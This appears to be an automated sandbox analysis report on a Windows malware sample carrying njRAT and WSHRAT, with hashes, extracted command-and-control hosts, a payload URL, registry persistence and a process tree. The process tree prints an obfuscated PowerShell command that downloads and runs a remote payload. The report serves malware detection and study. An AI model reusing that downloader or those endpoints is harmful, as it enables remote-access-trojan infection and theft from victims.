Analysis
-
max time kernel
4s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
21-03-2023 04:06
Static task
static1
Behavioral task
behavioral1
Sample
DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe
Resource
win10v2004-20230220-en
General
-
Target
DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe
-
Size
451KB
-
MD5
8eb05c68a5880d8f15fa787b02192709
-
SHA1
45813931de14ac2f4f66d412caf9cf6fd236c5c5
-
SHA256
df15669f7f948abd95d1a4c326aa0443f0cc534513b253accff8bd2549a3f3dc
-
SHA512
231d122c647684386399ebe117189f1d784f89ae127fb41a061b6d43bec94c7d9cda0f13b6a4ad7f1ad233177f9df43a11c6040180653bf592ee39d3e74708b3
-
SSDEEP
12288:BjKiWwykMpBMs3qLVmNwCIWaONK6ezkf4BBe/wKA3JIOb2:Bj5bMpf6L2wzWnW38zA3Zi
Malware Config
Extracted
https://files.catbox.moe/hw5nal.jpg
Extracted
njrat
0.7d
ofiss
ofi.dyn.ydns.io:5553
cde55e52fb830e966551ebb867b911f6
-
reg_key
cde55e52fb830e966551ebb867b911f6
-
splitter
|'|'|
Extracted
wshrat
http://ofi.dyn.ydns.io:8000
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.Certificates.Windows.js WScript.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.Certificates.Windows.js WScript.exe -
Executes dropped EXE 1 IoCs
pid Process 224 sfvip player.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\software\WOW6432Node\microsoft\windows\currentversion\run WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\System.Certificates.Windows.js\"" WScript.exe Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\software\microsoft\windows\currentversion\run WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\System.Certificates.Windows.js\"" WScript.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 1512 224 WerFault.exe 89 3064 224 WerFault.exe 89 -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 26 WSHRAT|D0F59775|TPAVZECK|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 21/3/2023|JavaScript-v2.0|IN:India HTTP User-Agent header 53 WSHRAT|D0F59775|TPAVZECK|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 21/3/2023|JavaScript-v2.0|IN:India -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2564 wrote to memory of 3312 2564 DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe 85 PID 2564 wrote to memory of 3312 2564 DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe 85 PID 2564 wrote to memory of 3312 2564 DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe 85 PID 2564 wrote to memory of 4484 2564 DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe 86 PID 2564 wrote to memory of 4484 2564 DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe 86 PID 2564 wrote to memory of 4484 2564 DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe 86 PID 2564 wrote to memory of 5060 2564 DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe 87 PID 2564 wrote to memory of 5060 2564 DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe 87 PID 2564 wrote to memory of 5060 2564 DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe 87 PID 2564 wrote to memory of 3056 2564 DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe 88 PID 2564 wrote to memory of 3056 2564 DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe 88 PID 2564 wrote to memory of 224 2564 DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe 89 PID 2564 wrote to memory of 224 2564 DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe 89 PID 3312 wrote to memory of 1064 3312 WScript.exe 90 PID 3312 wrote to memory of 1064 3312 WScript.exe 90 PID 3312 wrote to memory of 1064 3312 WScript.exe 90
Processes
-
C:\Users\Admin\AppData\Local\Temp\DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe"C:\Users\Admin\AppData\Local\Temp\DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\System.VBS"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3312 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\ProgramData\rrrrrrrr.ps1"3⤵PID:1064
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"4⤵PID:392
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"4⤵PID:4676
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"4⤵PID:4112
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\System.Certificates.Windows.js"2⤵
- Drops startup file
- Adds Run key to start application
PID:4484
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Java.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}2⤵PID:5060
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function ibNAikPWwgtnt($kyIUfjlo, $JTcfKfOUuo){[IO.File]::WriteAllBytes($kyIUfjlo, $JTcfKfOUuo)};function YczpVHAtPXfA($kyIUfjlo){if($kyIUfjlo.EndsWith((pxzGFEDn @(45083,45137,45145,45145))) -eq $True){rundll32.exe $kyIUfjlo }elseif($kyIUfjlo.EndsWith((pxzGFEDn @(45083,45149,45152,45086))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $kyIUfjlo}elseif($kyIUfjlo.EndsWith((pxzGFEDn @(45083,45146,45152,45142))) -eq $True){misexec /qn /i $kyIUfjlo}else{Start-Process $kyIUfjlo}};function ngDXZIlVXFBC($BsVKuudAUmTO){$JJdfgEaJRGBrY = New-Object (pxzGFEDn @(45115,45138,45153,45083,45124,45138,45135,45104,45145,45142,45138,45147,45153));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$JTcfKfOUuo = $JJdfgEaJRGBrY.DownloadData($BsVKuudAUmTO);return $JTcfKfOUuo};function pxzGFEDn($bQNW){$fVJWcyxb=45037;$oMKbCTAMoNPeFo=$Null;foreach($TerlvqdlS in $bQNW){$oMKbCTAMoNPeFo+=[char]($TerlvqdlS-$fVJWcyxb)};return $oMKbCTAMoNPeFo};function dPepQKsgLgDssQ(){$iOnAfkNBjQqBeerCG = $env:AppData + '\';$eLfUXisvXwHcf = $iOnAfkNBjQqBeerCG + 'wcqvss.com';If(Test-Path -Path $eLfUXisvXwHcf){Invoke-Item $eLfUXisvXwHcf;}Else{ $xlPtaPUVuQAAoD = ngDXZIlVXFBC (pxzGFEDn @(45141,45153,45153,45149,45152,45095,45084,45084,45139,45142,45145,45138,45152,45083,45136,45134,45153,45135,45148,45157,45083,45146,45148,45138,45084,45156,45136,45150,45155,45152,45152,45083,45136,45148,45146));ibNAikPWwgtnt $eLfUXisvXwHcf $xlPtaPUVuQAAoD;Invoke-Item $eLfUXisvXwHcf;};powershell -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded echo 123;;;;}dPepQKsgLgDssQ;3⤵PID:4012
-
C:\Users\Admin\AppData\Roaming\wcqvss.com"C:\Users\Admin\AppData\Roaming\wcqvss.com"4⤵PID:1388
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded echo 1234⤵PID:3680
-
-
-
-
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\Java Certificates.jar"2⤵PID:3056
-
-
C:\Users\Admin\AppData\Roaming\sfvip player.exe"C:\Users\Admin\AppData\Roaming\sfvip player.exe"2⤵
- Executes dropped EXE
PID:224 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 224 -s 10123⤵
- Program crash
PID:1512
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 224 -s 10123⤵
- Program crash
PID:3064
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 464 -p 224 -ip 2241⤵PID:1540
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
437B
MD5aa9197aabec7bbbacfb4c9fbf8eb2e0d
SHA1261936e557245937e069068839158a09e53c7d8b
SHA25629bf616b5bffd07ed28d5d0e69c0fa30d05d45c3e3d9abf1c37f1e56def16435
SHA5128e3680b1875d0ff39654c3fe2dee064b2f48973116fb7f1b056255c5547d95d29377794135c405fbd3f6da7c3f6a9629421ce2d9b09f9e4b62256f429cdbe9ed
-
Filesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
Filesize
53KB
MD5fc208db13b1239bfa1f4ee94d3505352
SHA1c998505025d8ac13f7052a4decd767fdc89020e3
SHA256bfb025eec226b78ba8230ab9a034404627919ee26cd9cd3954526b5954b11206
SHA51260a8dd3bc269a47ede1459016ca8d641ac6078d8b160c3f12929f56c1f384f89c08a61642acedf59d2bbf4702232eabac6392f12ab9d037a911adce0e73bea67
-
Filesize
788B
MD5ca5f639e334798ffdd4690ed692f203c
SHA14229aed715a3af798d53f75e0e2c516d5329abd9
SHA256a7e6ef8c446ff1abc0a5c00c308c135a5862ec9c82482c222fa3f3594ef9e134
SHA512b51d905706862b18a20126f8405fbe7fcc6bbc2e6daee830564f90d8cfba718beb6d741efdfd9bea4b1493519f8a20ec589302ea37adfa6aca2a4313f9a75a79
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
92KB
MD540ce31653e4038c1bfa3ee12c721d71d
SHA14c5057decb82f5338aab304088521a3e977786b0
SHA256661c4f08bf45f798dea332d2ba1583ef232e98281350f1ffeefd5b43ae0551ec
SHA512ea15a8025e7d6dc59bbfeb80b1ee8529c5c82cafddffe1954c3906d575e252c4a7e2045bf33ef7ce37c9a4f4d7ed1acc17926c13bb585b99ce3a5c9eabfe5f97
-
Filesize
10KB
MD506f39cb0a617f9bba5b8bc829697dd72
SHA133cd123eee708c733de4f6e37ea78d825ab5183f
SHA25653dcfe19a536f3965296b2e49fa1f936c90fa2b99b06e71cc00beedadbdfaa97
SHA5129f4059679a16938a8f03b168e7931ba2514c2772a7340ba667315ebc1a3b8c24c5b3c749fc57f85bf3872c0b73b7a3a3766b9e86c367e2340865f0797e65349a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.Certificates.Windows.js
Filesize475KB
MD53d2ce2ef6ed51c9b9b9eb490f7b6f7f0
SHA1d8a147081fb7ce7561481df34aacafb2680f4bf2
SHA256ae3b73102a4b1317a046c39def44e36821c40d1f07b1ae7db09232c2cb3052c1
SHA512d008cdacb38ba84095c9cb2e97c95534a15cb98192c070e152571afad62010c807bb451666e47e21b202d77fb26564f01773e4bbf35bcc32e99d84cb431273b5
-
Filesize
475KB
MD53d2ce2ef6ed51c9b9b9eb490f7b6f7f0
SHA1d8a147081fb7ce7561481df34aacafb2680f4bf2
SHA256ae3b73102a4b1317a046c39def44e36821c40d1f07b1ae7db09232c2cb3052c1
SHA512d008cdacb38ba84095c9cb2e97c95534a15cb98192c070e152571afad62010c807bb451666e47e21b202d77fb26564f01773e4bbf35bcc32e99d84cb431273b5
-
Filesize
984B
MD59d848c9972c6a431b81a38a9c184ea2b
SHA1027939ca3d01ac4f7bde80381ba9f4dd8e1ac281
SHA2566d1ca16b766a343630f954fff0e5ca159d82e55ffc197d4d2e23e71c8a61f4d3
SHA512fbdbfed4a779713e0f9324b082ad9462afb03e7ba97aad1357ec3f615e757a8eec2b4700d59a6f17a3f408b0478a88e5d54e374d885db4cf4d2120784b2a7163
-
Filesize
802KB
MD59cd16366ca3486523fcbbda63bc8c16b
SHA16f773925b546c0e5ff76b7ef29d0671033b53cfe
SHA25621f6f42282198dd5d031d5a6044fbac051ce73c3788b724872d4763714830415
SHA512f3205eab5dd0e13126b8356950195e8c6560aecd0d1dc7fc9c2280f4ec2974cb5f1b5d846c9ec23a1ee740702aebf7b8fbeb368c838f2346f53d7a27ea35f960
-
Filesize
802KB
MD59cd16366ca3486523fcbbda63bc8c16b
SHA16f773925b546c0e5ff76b7ef29d0671033b53cfe
SHA25621f6f42282198dd5d031d5a6044fbac051ce73c3788b724872d4763714830415
SHA512f3205eab5dd0e13126b8356950195e8c6560aecd0d1dc7fc9c2280f4ec2974cb5f1b5d846c9ec23a1ee740702aebf7b8fbeb368c838f2346f53d7a27ea35f960
-
Filesize
802KB
MD59cd16366ca3486523fcbbda63bc8c16b
SHA16f773925b546c0e5ff76b7ef29d0671033b53cfe
SHA25621f6f42282198dd5d031d5a6044fbac051ce73c3788b724872d4763714830415
SHA512f3205eab5dd0e13126b8356950195e8c6560aecd0d1dc7fc9c2280f4ec2974cb5f1b5d846c9ec23a1ee740702aebf7b8fbeb368c838f2346f53d7a27ea35f960
-
Filesize
22KB
MD544a163b10ef8607658aab1295a5a1e8a
SHA1a498c30c4189c1e69c94a2121e72f73c7e0e727d
SHA25699d130bf6fd7381a42190e506aa5f6db9b0503d88f0b4f80fbe8ae83576a9da8
SHA512390f646e1b2a0925f49932c42f50ff963efc25bd45f692e2f0eb9fd392496289f096901db35170b0497cdcf6927636577cc9b0d0decb88423b4455a176111991
-
Filesize
22KB
MD544a163b10ef8607658aab1295a5a1e8a
SHA1a498c30c4189c1e69c94a2121e72f73c7e0e727d
SHA25699d130bf6fd7381a42190e506aa5f6db9b0503d88f0b4f80fbe8ae83576a9da8
SHA512390f646e1b2a0925f49932c42f50ff963efc25bd45f692e2f0eb9fd392496289f096901db35170b0497cdcf6927636577cc9b0d0decb88423b4455a176111991